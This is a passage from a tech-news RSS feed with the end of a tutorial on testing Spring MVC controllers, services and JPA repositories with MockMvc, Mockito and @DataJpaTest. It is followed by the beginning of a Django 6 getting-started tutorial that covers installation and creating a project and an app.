<p class="wp-block-paragraph">The <code>testGetWidgets()</code> method creates a list of three widgets and then configures the mock <code>WidgetService</code> to return the list when its <code>findAll()</code> method is called. The <code>WidgetControllerTest</code> class statically imports the <code>org.mockito.Mockito.when()</code> method that accepts a method call, which in this case is <code>widgetService.findAll()</code>, and returns a Mockito <code>OngoingStubbing</code> instance. This <code>OngoingStubbing</code> instance exposes methods like <code>thenReturn()</code>, <code>thenThrow()</code>, <code>thenCallRealMethod()</code>, <code>thenAnswer()</code>, and <code>then()</code>.</p>



<p class="wp-block-paragraph">Here, we use the <code>thenReturn()</code> method to tell Mockito to return the list of widgets when the <code>WidgetService</code>’s <code>findAll()</code> method is called. The <code>@MockitoBean</code> annotation causes the mock <code>WidgetService</code> to be autowired into the <code>WidgetController</code>. So, when the <code>getWidgets()</code> method is called in response to a <code>GET /widgets</code>, it calls the <code>WidgetService</code>’s <code>findAll()</code> method and returns our list of widgets as a web response.</p>



<p class="wp-block-paragraph">Next, we use <code>MockMvc</code>’s <code>perform()</code> method to execute a web request. This diagram shows the various classes that interact with the  <code>perform()</code> method:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/10/TestingSpringMVC-fig2.png?w=1024" alt="Diagram of classes that interact with the MockMvc perform() method." class="wp-image-4078130" width="1024" height="439" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Steven Haines</p></div>



<p class="wp-block-paragraph">The <code>perform()</code> method accepts a <code>RequestBuilder</code>. Spring defines several built-in <code>RequestBuilder</code>s that we can statically import into our tests, including <code>get()</code>, <code>post()</code>, <code>put()</code>, and <code>delete()</code>. The <code>perform()</code> method returns a <code>ResultActions</code> instance that exposes methods such as <code>andExpect()</code>, <code>andExpectAll()</code>, <code>andDo()</code>, and <code>andReturn()</code>. Here, we invoke the <code>andExpect()</code> method, which accepts a <code>ResultMatcher</code>. </p>



<p class="wp-block-paragraph">A <code>ResultMatcher</code> defines a<code> match()</code> method that throws an <code>AssertionError</code> if the assertion fails. Spring defines several <code>ResultMatcher</code>s that we can statically import:</p>



<ul class="wp-block-list">
<li><code>status()</code> allows us to check the HTTP status code of response.</li>



<li><code>content()</code> allows us to check the content headers of the response, such as <code>Content-Type</code>.</li>



<li><code>header()</code> allows us to check any of the HTTP header values.</li>



<li><code>jsonPath()</code> allows us to inspect the contents of a <a href="https://www.infoworld.com/article/2255837/what-is-json-a-better-format-for-data-exchange.html" data-type="link" data-id="https://www.infoworld.com/article/2255837/what-is-json-a-better-format-for-data-exchange.html">JSON document</a>.</li>
</ul>



<p class="wp-block-paragraph">After MockMvc performs a <code>GET to /widgets</code>, we expect the HTTP status code to be <code>200 OK</code>.  We can then use the <code>jsonPath</code> matcher to check the body results, using the following JSON path expressions:</p>



<ul class="wp-block-list">
<li><code>$.length()</code>: The <code>$</code> references the root of the JSON document. If the response is a list, then we can call the <code>length()</code> method to get the number of elements in the list.</li>



<li><code>$[0].id</code>: JSON path expressions for a list use an array syntax starting at 0. This expression gets the ID of the first element in the list.</li>



<li><code>$[0].name</code>: This expression gets the name of the first element and compares it to “<code>Widget 1</code>”.</li>



<li><code>$[0].version</code>: This expression gets the version of the first element and compares it to 1.</li>
</ul>



<h3 class="wp-block-heading">Unit testing the GET /widget/{id} handler</h3>



<p class="wp-block-paragraph">Here’s the source code to test the <code>GET /coffee/{id}</code> widget:</p>



<pre class="wp-block-code"><code>@Test
void testGetWidgetById() throws Exception {
    Widget widget = new Widget(1L, "My Widget", 1);          
    when(widgetService.findById(1L))
           .thenReturn(Optional.of(widget));

    mockMvc.perform(get("/widget/{id}", 1))
            // Validate that we get a 200 OK Response Code
            .andExpect(status().isOk())

            // Validate Headers
            .andExpect(content()
                      .contentType(MediaType.APPLICATION_JSON))
            .andExpect(header().string(HttpHeaders.LOCATION,
                                       "/widget/1"))
            .andExpect(header().string(HttpHeaders.ETAG, "\"1\""))

            // Validate content
            .andExpect(jsonPath("$.id").value(1L))
            .andExpect(jsonPath("$.name").value("My Widget"))
            .andExpect(jsonPath("$.version").value(1));
 }</code></pre>



<p class="wp-block-paragraph">This test method is very similar to the <code>testGetWidgets()</code> method, but with some notable changes:</p>



<ul class="wp-block-list">
<li>The <code>GET</code> URI is defined using a URI template. You can specify any number of variables enclosed in braces in the URI template and then send a list of arguments that will replace those variables in the order they appear in the template.</li>



<li>We check that the returned <code>Content-Type</code> is <code>“application/json”</code>, which is a constant in the <code>MediaType</code> class. We access the content using the <code>content()</code> method, which returns a <code>ContentResultMatchers</code> instance that provides various methods, including <code>contentType()</code>, which allows us to validate the content headers.</li>



<li>We check for specific header values using the <code>header()</code> method. The <code>header()</code> method returns a <code>HeadersResultMatchers</code> instance, which can check for header <code>String</code>, <code>long</code>, and <code>date</code> values, as well as checking to see whether or not specific headers exist. In this case, we use constants defined in the <code>HttpHeaders</code> class to check the <code>location</code> and <code>eTag</code> header values.</li>



<li>We check the body of the response using JSON path expressions. In this case, we do not have a list of objects, so we can access the individual fields in the JSON document directly. For example, <code>$.id</code> retrieves the <code>id</code> field value in the root of the document.</li>
</ul>



<h3 class="wp-block-heading">Unit testing a GET /widget/{id} Not Found code</h3>



<p class="wp-block-paragraph">Next, we test the <code>GET /widget/{id}</code>, passing it an invalid ID so that it returns a 404 Not Found response code:</p>



<pre class="wp-block-code"><code>@Test
void testGetWidgetByIdNotFound() throws Exception {
   when(widgetService.findById(1L)).thenReturn(Optional.empty());

   mockMvc.perform(get("/widget/{id}", 1))
            // Validate that we get a 404 Not Found Response Code
            .andExpect(status().isNotFound());
}</code></pre>



<p class="wp-block-paragraph">The <code>testGetWidgetByIdNotFound()</code> method configures the mock <code>WidgetService</code> to return <code>Optional.empty()</code> when its <code>findById()</code> is called with a value of 1. We then perform a <code>GET</code> request to <code>/widget/1</code>, then assert that the returned HTTP status code is 404 Not Found.</p>



<h3 class="wp-block-heading">Unit testing POST /widgets</h3>



<p class="wp-block-paragraph">Here’s how to test a <code>Widget</code> creation:</p>



<pre class="wp-block-code"><code>@Test
void testCreateWidget() throws Exception {
    Widget widget = new Widget(1L, "Widget 1", 1);
    when(widgetService.create(any())).thenReturn(widget);

    mockMvc.perform(post("/widgets")
            .contentType(MediaType.APPLICATION_JSON)
            .content("{\"name\": \"Widget 1\"}"))

            // Validate that we get a 201 Created Response Code
            .andExpect(status().isCreated())

            // Validate Headers
            .andExpect(content().contentType(
                                      MediaType.APPLICATION_JSON))
            .andExpect(header().string(HttpHeaders.LOCATION, 
                                       "/widget/1"))
            .andExpect(header().string(HttpHeaders.ETAG, "\"1\""))

            // Validate content
            .andExpect(jsonPath("$.id").value(1L))
            .andExpect(jsonPath("$.name").value("Widget 1"))
            .andExpect(jsonPath("$.version").value(1));</code></pre>



<p class="wp-block-paragraph">The <code>testCreateWidget()</code> method first creates a <code>Widget</code> to return when the <code>WidgetService</code>’s <code>create()</code> method is called with any argument. The <code>any()</code> matcher matches any argument and, because the <code>createWidget()</code> handler will create a new <code>Widget</code> instance, we will not have access to that instance when the test runs. We then invoke MockMvc’s <code>perform()</code> method to the <code>”/widgets”</code> URI, sending the content body of a new widget named <code>“Widget 1”</code>, using the <code>content()</code> method. We expect a 201 Created HTTP response code, an “<code>application/json</code>” content type, a location header of “<code>/widget/1</code>”, and an <code>eTag</code> value of the <code>String</code> “<code>1</code>”. The body of the response should match the <code>Widget</code> we returned from the <code>create()</code> method, namely an ID of 1, a name of “Widget 1”, and a version of 1.</p>



<h3 class="wp-block-heading">Unit testing PUT /widget</h3>



<p class="wp-block-paragraph">This code runs three tests for the <code>PUT</code> operation:</p>



<pre class="wp-block-code"><code>@Test
public void testSuccessfulUpdate() throws Exception {
    // Create a mock Widget when the WidgetService's findById(1L) 
    // is called
    Widget mockWidget = new Widget(1L, "Widget 1", 5);
    when(widgetService.findById(1L))
                      .thenReturn(Optional.of(mockWidget));

    // Create a mock Coffee that is returned when the 
    // CoffeeController saves the Coffee to the database
    Widget savedWidget = new Widget(1L, "Updated Widget 1", 6);
    when(widgetService.save(any())).thenReturn(savedWidget);

    // Execute a PUT /widget/1 with a matching version: 5
    mockMvc.perform(put("/widget/{id}", 1L)
                    .contentType(MediaType.APPLICATION_JSON)
                    .header(HttpHeaders.IF_MATCH, 5)
                    .content("{\"id\": 1, " +
                             "\"name\": \"Updated Widget 1\"}"))

            // Validate that we get a 200 OK HTTP Response
           .andExpect(status().isOk())

            // Validate the headers
           .andExpect(content()
                        .contentType(MediaType.APPLICATION_JSON))
           .andExpect(header().string(HttpHeaders.LOCATION, 
                                      "/widget/1"))
           .andExpect(header().string(HttpHeaders.ETAG, "\"6\""))

           // Validate the contents of the response
           .andExpect(jsonPath("$.id").value(1L))
           .andExpect(jsonPath("$.name")
                               .value("Updated Widget 1"))
           .andExpect(jsonPath("$.version").value(6));
}

@Test
public void testUpdateConflict() throws Exception {
   // Create a mock coffee with a version set to 5
   Widget mockWidget = new Widget(1L, "Widget 1", 5);

    // Return the mock Coffee when the CoffeeService's 
    // findById(1L) is called
    when(widgetService.findById(1L))
                      .thenReturn(Optional.of(mockWidget));

    // Execute a PUT /widget/1 with a mismatched version number: 2
    mockMvc.perform(put("/widget/{id}", 1L)
                    .contentType(MediaType.APPLICATION_JSON)
                    .header(HttpHeaders.IF_MATCH, 2)
                    .content("{\"id\": 1, " + 
                             "\"name\":  \"Updated Widget 1\"}"))
             // Validate that we get a 409 Conflict HTTP Response
            .andExpect(status().isConflict());
}

@Test
public void testUpdateNotFound() throws Exception {
   // Return the mock Coffee when the CoffeeService's 
   // findById(1L) is called
   when(widgetService.findById(1L)).thenReturn(Optional.empty());

   // Execute a PUT /coffee/1 with a mismatched version number: 2
   mockMvc.perform(put("/widget/{id}", 1L)
                    .contentType(MediaType.APPLICATION_JSON)
                    .header(HttpHeaders.IF_MATCH, 2)
                    .content("{\"id\": 1, " + 
                             "\"name\":  \"Updated Coffee 1\"}"))

           // Validate that we get 404 Not Found
           .andExpect(status().isNotFound());
}</code></pre>



<p class="wp-block-paragraph">We have three variations:</p>



<ul class="wp-block-list">
<li>A successful update.</li>



<li>A failed update because of a version conflict.</li>



<li>A failed update because the widget was not found.</li>
</ul>



<p class="wp-block-paragraph">In RESTful web services, version management is handled by the entity tag, or<code> eTag</code>. When you retrieve an entity, it has an <code>eTag</code> value. When you want to update the entity, you pass that <code>eTag</code> value in the <code>If-Match</code> HTTP header. If the <code>If-Match</code> header does not match the current <code>eTag</code>, which is the <code>Widget</code> version in our implementation, then the <code>PUT</code> handler returns a 409 Conflict HTTP response code. If you get this error, it means that you need to retrieve the entity again and retry your operation. This way, if two different clients attempt to update the same entity simultaneously, only one will succeed.</p>



<p class="wp-block-paragraph">In the <code>testSuccessfulUpdate() </code>method, we return a <code>Widget</code> with a version of 5 when the <code>WidgetService</code>’s <code>findById()</code> method is called. We then pass an <code>If-Match</code> header value of 5 and then validate that we get a 200 OK HTTP response code and the expected header and body values. In the <code>testUpdateConflict()</code> method, we do the same thing, but we set the <code>If-Match</code> header to 2, which does not match 5, so we validate that we get a 409 Conflict HTTP response code. And finally, in the <code>testUpdateNotFound()</code> method, we configure the <code>WidgetService</code> to return an <code>Optional.empty()</code> when its <code>findById()</code> method is called, so we execute the <code>PUT</code> operation and validate that we get a 404 Not Found HTTP response code.</p>



<h3 class="wp-block-heading">Unit testing DELETE /widget</h3>



<p class="wp-block-paragraph">Finally, here is the source code for our two <code>DELETE /widget</code> tests:</p>



<pre class="wp-block-code"><code>@Test
void testDeleteSuccess() throws Exception {
    // Setup mocked product
    Widget mockWidget = new Widget(1L, "Widget 1", 5);

    // Setup the mocked service
    when(widgetService.findById(1L))
                      .thenReturn(Optional.of(mockWidget));
    doNothing().when(widgetService).deleteById(1L);

    // Execute our DELETE request
    mockMvc.perform(delete("/widget/{id}", 1L))
            .andExpect(status().isOk());
}

@Test
void testDeleteNotFound() throws Exception {
    // Setup the mocked service
    when(widgetService.findById(1L)).thenReturn(Optional.empty());

    // Execute our DELETE request
    mockMvc.perform(delete("/widget/{id}", 1L))
            .andExpect(status().isNotFound());
}</code></pre>



<p class="wp-block-paragraph">The <code>DELETE</code> handler first tries to find the widget by ID and then calls the<code> WidgetService</code>’s <code>deleteById()</code> method. The <code>testDeleteSuccess()</code> method configures the <code>WidgetService</code> to return a mock <code>Widget</code> when the <code>findById()</code> method is called and then configures it to do nothing when the <code>deleteById()</code> method is called. The <code>deleteById()</code> method returns void, so we do not need to mock a response, though we do want to allow the method to be called. We execute the <code>DELETE</code> operation and validate that we receive a 200 OK HTTP response code. The<code> testDeleteNotFound()</code> method configures the <code>WidgetService</code> to return <code>Optional.empty()</code> when its <code>findById()</code> method is called. We execute the <code>DELETE</code> operation and validate that we receive a 404 Not Found HTTP response code.</p>



<p class="wp-block-paragraph">At this point, we have a comprehensive set of tests for all of our controller operations. Let’s continue down our stack and test our service.</p>



<h2 class="wp-block-heading">Unit testing a Spring MVC service</h2>



<p class="wp-block-paragraph">Next, we’ll test a <code>WidgetService</code> class, shown here:</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.service;

import java.util.List;
import java.util.Optional;

import com.infoworld.widgetservice.model.Widget;
import com.infoworld.widgetservice.repository.WidgetRepository;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;

@Service
public class WidgetService {
    @Autowired
    private WidgetRepository widgetRepository;

    public List findAll() {
        return widgetRepository.findAll();
    }

    public Optional findById(Long id) {
        return widgetRepository.findById(id);
    }

    public Widget create(Widget widget) {
        widget.setVersion(1);
        return widgetRepository.save(widget);
    }

    public Widget save(Widget widget) {
        return widgetRepository.save(widget);
    }

    public void deleteById(Long id) {
        widgetRepository.deleteById(id);
    }
}</code></pre>



<p class="wp-block-paragraph">The <code>WidgetService</code> is very simple. It autowires in a <code>WidgetRepository</code> and then delegates almost all its functionality to the <code>WidgetRepository</code>. The only business logic it implements is that it sets the <code>Widget</code> version to 1 in the <code>create()</code> method, when it is persisting a new <code>Widget</code> to the database.</p>



<p class="wp-block-paragraph">While Spring supports slice testing for our controller and (as you’ll soon see) our repository, it doesn’t have a slice testing annotation for our service. We could use the <code>@SpringBootTest</code> annotation, but then Spring would load all the controllers, repositories, and any other Spring resources in our application into the Spring application context. We can avoid by using Mockito directly. </p>



<p class="wp-block-paragraph">Here is the source code for the <code>WidgetServiceTest</code> class:</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.service;

import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertTrue;
import static org.mockito.Mockito.when;

import java.util.Optional;

import com.infoworld.widgetservice.model.Widget;
import com.infoworld.widgetservice.repository.WidgetRepository;

import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.junit.jupiter.MockitoExtension;

@ExtendWith(MockitoExtension.class)
public class WidgetServiceTest {
    @Mock
    private WidgetRepository repository;

    @InjectMocks
    private WidgetService service;

    @Test
    void testFindById() {
        Widget widget = new Widget(1L, "My Widget", 1);
        when(repository.findById(1L)).thenReturn(Optional.of(widget));

        Optional w = service.findById(1L);
        assertTrue(w.isPresent());
        assertEquals(1L, w.get().getId());
        assertEquals("My Widget", w.get().getName());
        assertEquals(1, w.get().getVersion());
    }
}</code></pre>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4009216/advanced-unit-testing-with-junit-5-mockito-and-hamcrest.html">JUnit 5 supports extensions</a> and Mockito has defined a test extension that we can access through the <code>@ExtendWith</code> annotation. This extension allows Mockito to read our class, find objects to mock, and inject mocks into other classes. The <code>WidgetServiceTest </code>tells Mockito to create a mock <code>WidgetRepository</code>, by annotating it with the <code>@Mock</code> annotation, and then to inject that mock into the <code>WidgetService</code>, using the <code>@InjectMocks</code> annotation. The result is that we have a <code>WidgetService</code> that we can test and it will have a mock <code>WidgetRepository</code> that we can configure for our test cases.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/4009216/advanced-unit-testing-with-junit-5-mockito-and-hamcrest.html">Advanced unit testing with JUnit 5, Mockito, and Hamcrest</a>.</strong></p>



<p class="wp-block-paragraph">This is not a comprehensive test, but it should get you started. It has a single method, <code>testFindById()</code>, that demonstrates how to test a service method. It creates a mock <code>Widget</code> instance and then uses the Mockito <code>when()</code> method, just as we used in the controller test, to configure the <code>WidgetRepository</code> to return an <code>Optional</code> of that <code>Widget</code> when its <code>findById()</code> method is called. Then it invokes the <code>WidgetService</code>’s <code>findById()</code> method and validates that the mock <code>Widget</code> is returned.</p>



<h2 class="wp-block-heading">Slice testing a Spring Data JPA repository</h2>



<p class="wp-block-paragraph">Next, we’ll slice test our JPA repository (<code>WidgetRepository.java</code>), shown here:</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.repository;

import java.util.List;
import com.infoworld.widgetservice.model.Widget;
import org.springframework.data.jpa.repository.JpaRepository;

public interface WidgetRepository extends JpaRepository {
    List findByName(String name);
}</code></pre>



<p class="wp-block-paragraph">The <code>WidgetRepository</code> is a Spring Data JPA repository, which means that we define the interface and Spring generates the implementation. It extends the <code>JpaRepository</code> interface, which accepts two arguments:</p>



<ul class="wp-block-list">
<li>The type of entity that it persists, namely a <code>Widget</code>.</li>



<li>The type of primary key, which in this case is a <code>Long</code>.</li>
</ul>



<p class="wp-block-paragraph">It generates common CRUD method implementations for us to create, update, delete, and find widgets, and then we can define our own query methods using a specific naming convention. For example, we define a <code>findByName()</code> method that returns a <code>List</code> of <code>Widget</code>s. Because “<code>name</code>” is a field in our <code>Widget</code> entity, Spring will generate a query that finds all widgets with the specified name.</p>



<p class="wp-block-paragraph">Here is our <code>WidgetRepositoryTest</code> class:</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.repository;

import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import static org.junit.jupiter.api.Assertions.assertNull;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

import com.infoworld.widgetservice.model.Widget;

import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
import org.springframework.boot.test.autoconfigure.orm.jpa.TestEntityManager;

@DataJpaTest
public class WidgetRepositoryTest {
    @Autowired
    private TestEntityManager entityManager;

    @Autowired
    private WidgetRepository widgetRepository;

    private final List widgetIds = new ArrayList();
    private final List testWidgets = Arrays.asList(
            new Widget("Widget 1", 1),
            new Widget("Widget 2", 1),
            new Widget("Widget 3", 1)
    );

    @BeforeEach
    void setup() {
        testWidgets.forEach(widget -&gt; {
            entityManager.persist(widget);
            widgetIds.add((Long)entityManager.getId(widget));
        });
        entityManager.flush();
    }

    @AfterEach
    void teardown() {
        widgetIds.forEach(id -&gt; {
            Widget widget = entityManager.find(Widget.class, id);
            if (widget != null) {
                entityManager.remove(widget);
            }
        });
        widgetIds.clear();
    }

    @Test
    void testFindAll() {
        List widgetList = widgetRepository.findAll();
        assertEquals(3, widgetList.size());
    }

    @Test
    void testFindById() {
        Widget widget = widgetRepository.findById(
                               widgetIds.getFirst()).orElse(null);

        assertNotNull(widget);
        assertEquals(widgetIds.getFirst(), widget.getId());
        assertEquals("Widget 1", widget.getName());
        assertEquals(1, widget.getVersion());
    }

    @Test
    void testFindByIdNotFound() {
        Widget widget = widgetRepository.findById(
            widgetIds.getFirst() + testWidgets.size()).orElse(null);
        assertNull(widget);
    }

    @Test
    void testCreateWidget() {
        Widget widget = new Widget("New Widget", 1);
        Widget insertedWidget = widgetRepository.save(widget);

        assertNotNull(insertedWidget);
        assertEquals("New Widget", insertedWidget.getName());
        assertEquals(1, insertedWidget.getVersion());
        widgetIds.add(insertedWidget.getId());
    }

    @Test
    void testFindByName() {
        List found = widgetRepository.findByName("Widget 2");
        assertEquals(1, found.size(), "Expected to find 1 Widget");

        Widget widget = found.getFirst();
        assertEquals("Widget 2", widget.getName());
        assertEquals(1, widget.getVersion());
    }
}</code></pre>



<p class="wp-block-paragraph">The <code>WidgetRepositoryTest</code> class is annotated with the <code>@DataJpaTest</code> annotation, which is a slice-testing annotation that loads repositories and entities into the Spring application context and creates a <code>TestEntityManager</code> that we can autowire into our test class. The <code>TestEntityManager</code> allows us to perform database operations outside of our repository so that we can set up and tear down our test scenarios.</p>



<p class="wp-block-paragraph">In the <code>WidgetRepositoryTest</code> class, we autowire in both our <code>WidgetRepository</code> and <code>TestEntityManager</code>. Then, we define a <code>setup()</code> method that is annotated with JUnit’s <code>@BeforeEach</code> annotation, so it will be executed <em>before</em> each test case runs. Next, we define a <code>teardown()</code> method that is annotated with JUnit’s <code>@AfterEach</code> annotation, so it will be executed <em>after</em> each test completes. The class defines a <code>testWidgets</code> list that contains three test widgets and then the <code>setup()</code> method inserts those into the database using the <code>TestEntityManager</code>’s <code>persist()</code> method. After it inserts each widget, it saves the automatically generated ID so that we can reference it in our tests. Finally, after persisting the widgets, it flushes them to the database by calling the <code>TestEntityManager</code>’s <code>flush()</code> method. The <code>teardown()</code> method iterates over all <code>Widget</code> IDs, finds the <code>Widget</code> using the <code>TestEntityManager</code>’s <code>find()</code> method, and, if it is found, removes it from the database. Finally, it clears the widget ID list so that the<code> setup()</code> method can rebuild it for the next test. (Note that the <code>TestEntityManager</code> removes entities directly; it does not have a <em>remove by ID</em> method, so we first have to find each <code>Widget</code> and then remove them one-by-one.)</p>



<p class="wp-block-paragraph">Even though most of the methods being tested are autogenerated and well tested, I wanted to demonstrate how to write several kinds of tests. The only method that we really need to test is the <code>findByName()</code> method because that is the only custom method we define. For example, if we were to define the method as <code><em>findByNam()</em></code> instead of <code>findByName()</code>, then the method would not work, so it is definitely worth testing.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">Spring provides robust support for testing each layer of a Spring MVC application. In this article, we reviewed how to test controllers, using <a href="https://docs.spring.io/spring-framework/reference/testing/mockmvc.html" data-type="link" data-id="https://docs.spring.io/spring-framework/reference/testing/mockmvc.html">MockMvc</a>; services, using the <a href="https://www.infoworld.com/article/4009216/advanced-unit-testing-with-junit-5-mockito-and-hamcrest.html" data-type="link" data-id="https://www.infoworld.com/article/4009216/advanced-unit-testing-with-junit-5-mockito-and-hamcrest.html">JUnit Mockito extension</a>; and repositories, using the Spring <a href="https://docs.spring.io/spring-boot/api/java/org/springframework/boot/test/autoconfigure/orm/jpa/TestEntityManager.html" data-type="link" data-id="https://docs.spring.io/spring-boot/api/java/org/springframework/boot/test/autoconfigure/orm/jpa/TestEntityManager.html">TestEntityManager</a>. We also reviewed slice testing as a strategy to reduce testing resource utilization and minimize the time required to execute tests. Slice testing is implemented in Spring using the <code>@WebMvcTest</code> and <code>@DataJpaTest</code> annotations. I hope these examples have given you everything you need to feel comfortable writing robust tests for your Spring MVC applications.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Django tutorial: Get started with Django 6]]></title>
<description><![CDATA[Django is a one-size-fits-all Python web framework that was inspired by Ruby on Rails and uses many of the same metaphors to make web development fast and easy. Fully loaded and flexible, Django has become one of Python’s most widely used web frameworks.



Now in version 6.0, Django includes vir...]]></description>
<link>https://tsecurity.de/de/3665671/ai-nachrichten/django-tutorial-get-started-with-django-6/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665671/ai-nachrichten/django-tutorial-get-started-with-django-6/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:35 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Django is a one-size-fits-all <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">Python</a> web framework that was inspired by <a href="https://www.infoworld.com/article/2337962/whatever-happened-to-ruby.html">Ruby on Rails</a> and uses many of the same metaphors to make web development fast and easy. Fully loaded and flexible, Django has become one of Python’s most widely used web frameworks.</p>



<p class="wp-block-paragraph">Now in version 6.0, Django includes virtually everything you need to build a web application of any size, and its popularity makes it easy to find examples and help for various scenarios. Plus, Django provides tools to allow your application to evolve and add features gracefully, and to migrate its data schema if there is one.</p>



<p class="wp-block-paragraph">Django also has a reputation for being complex, with many components and a good deal of “under the hood” configuration required. In truth, you can use Django to get a simple Python application up and running in relatively short order, then expand its functionality as needed.</p>



<p class="wp-block-paragraph">This article guides you through creating a basic application using Django 6.0. We’ll also touch on the most crucial features for web developers in the <a href="https://docs.djangoproject.com/en/6.0/releases/6.0">Django 6 release</a>.</p>



<aside class="sidebar large">
<h3>What version of Python do I need?</h3>
<p>To install Django 6.0, you will need Python 3.12 or better. Ideally, you should use the most recent Python version that supports everything you want to do with your Django project, but in some cases, it may not be possible to update. If you’re stuck with an earlier version of Python, you may be able to use Django 5. Consult <a href="https://docs.djangoproject.com/en/6.0/faq/install/#what-python-version-can-i-use-with-django">Django’s Python version table</a> to find out which versions you can use.</p>
</aside>




<h2 class="wp-block-heading">Installing Django</h2>



<p class="wp-block-paragraph">Assuming you have Python 3.12 or higher installed, the first step to installing Django is to <a href="https://www.infoworld.com/article/2260103/virtualenv-and-venv-python-virtual-environments-explained.html">create a virtual environment</a>. Installing Django in the venv keeps Django and its associated libraries separate from your base Python installation, which is always a good practice.</p>



<aside class="sidebar large">
<h3>Note about venvs</h3>
<p>Note that you do not need to use virtual environments to create multiple projects using a single instance of Django. You only need them to isolate different point revisions of the Django framework, each with different projects.</p>
</aside>




<p class="wp-block-paragraph">Next, install Django in your chosen virtual environment via Python’s <code>pip</code> utility:</p>



<pre class="wp-block-code"><code>pip install django</code></pre>



<p class="wp-block-paragraph">This installs the core Django libraries and the <code>django-admin</code> command-line utility used to manage Django projects.</p>



<h2 class="wp-block-heading">Creating a new Django project</h2>



<p class="wp-block-paragraph">Django instances are organized into two tiers: <em>projects</em> and <em>apps</em>.</p>



<ul class="wp-block-list">
<li>A <em>project</em> is an instance of Django with its own database configuration, settings, and apps. It’s best to think of a project as a place to store all the site-level configurations you’ll use.</li>



<li>An <em>app</em> is a subdivision of a project, with its own route and rendering logic. Multiple apps can be placed in a single Django project.</li>
</ul>



<p class="wp-block-paragraph">To create a new Django project from scratch, activate the virtual environment where you have Django installed. Then enter the directory where you want to store the project and type:</p>



<pre class="wp-block-code"><code>django-admin startproject </code></pre>



<p class="wp-block-paragraph">The <code></code> is the name of both the project and the subdirectory where the project will be stored. Be sure to pick a name that isn’t likely to collide with a name used by Python or Django internally. A name like <code>myproj</code> works well.</p>



<p class="wp-block-paragraph">The newly created directory should contain a <code>manage.py</code> file, which is used to control the app’s behavior from the command line, along with another subdirectory (also with the project name) that contains the following files:</p>



<ul class="wp-block-list">
<li>An <code>__init__.py</code> file, which is used by Python to designate a subdirectory as a code module.</li>



<li><code>settings.py</code>, which holds the settings used for the project. Many of the most common settings will be pre-populated for you.</li>



<li><code>urls.py</code>, which lists the routes or URLs available to your Django project, or that the project will return responses for.</li>



<li><code>wsgi.py</code>, which is used by WSGI-compatible web servers, such as Apache HTTP or Nginx, to <a href="https://docs.djangoproject.com/en/6.0/howto/deployment/wsgi">serve your project’s apps</a>.</li>



<li><code>asgi.py</code>, which is used by ASGI-compatible web servers to serve your project’s apps. <a href="https://www.infoworld.com/article/2335107/asgi-explained-the-future-of-python-web-development.html">ASGI</a> is a relatively new standard for asynchronous servers and applications, and requires a server that supports it, like <code>uvicorn</code>. Django only recently added native support for asynchronous applications, which will also need to be <a href="https://docs.djangoproject.com/en/6.0/howto/deployment/asgi">hosted on an async-compatible server</a> to be fully effective.</li>
</ul>



<p class="wp-block-paragraph">Next, test the project to ensure it’s functioning. From the command line in the directory containing your project’s <code>manage.py</code> file, enter:</p>



<pre class="wp-block-code"><code>python manage.py runserver</code></pre>



<p class="wp-block-paragraph">This should start a development web server available at <code>http://127.0.0.1:8000/</code>. Visit that link and you should see a simple welcome page that tells you the installation was successful.</p>



<p class="wp-block-paragraph">Note that the development web server should <em>not</em> be used to serve a Django project to the public. It’s solely for local testing and is not designed to scale for public-facing applications.</p>



<h2 class="wp-block-heading">Creating a Django application</h2>



<p class="wp-block-paragraph">Next, we’ll create an application inside of this project. Navigate to the same directory as <code>manage.py</code> and issue the following command:</p>



<pre class="wp-block-code"><code>python manage.py startapp myapp</code></pre>



<p class="wp-block-paragraph">This creates a subdirectory for an application named <code>myapp</code> that contains the following:</p>



<ul class="wp-block-list">
<li>A migrations directory: Contains code used to <a href="https://docs.djangoproject.com/en/6.0/topics/migrations">migrate the site</a> between versions of its data schema. Django projects typically have a database, so the schema for the database—including changes to the schema—is managed as part of the project.</li>



<li><code>admin.py</code>: Contains objects used by Django’s <a href="https://docs.djangoproject.com/en/6.0/ref/contrib/admin">built-in administration tools</a>. If your app has an admin interface or privileged users, you will configure the related objects here.</li>



<li><code>apps.py</code>: Provides <a href="https://docs.djangoproject.com/en/6.0/ref/applications/">configuration information about the app</a> to the project at large, by way of an <code>AppConfig</code> object.</li>



<li><code>models.py</code>: Contains <a href="https://docs.djangoproject.com/en/6.0/topics/db/models">objects that define data structures</a>, used by your app to interface with databases.</li>



<li><code>tests.py</code>: Contains any <a href="https://docs.djangoproject.com/en/6.0/intro/tutorial05">tests</a> created by you and used to ensure that your site’s functions and modules are working as intended.</li>



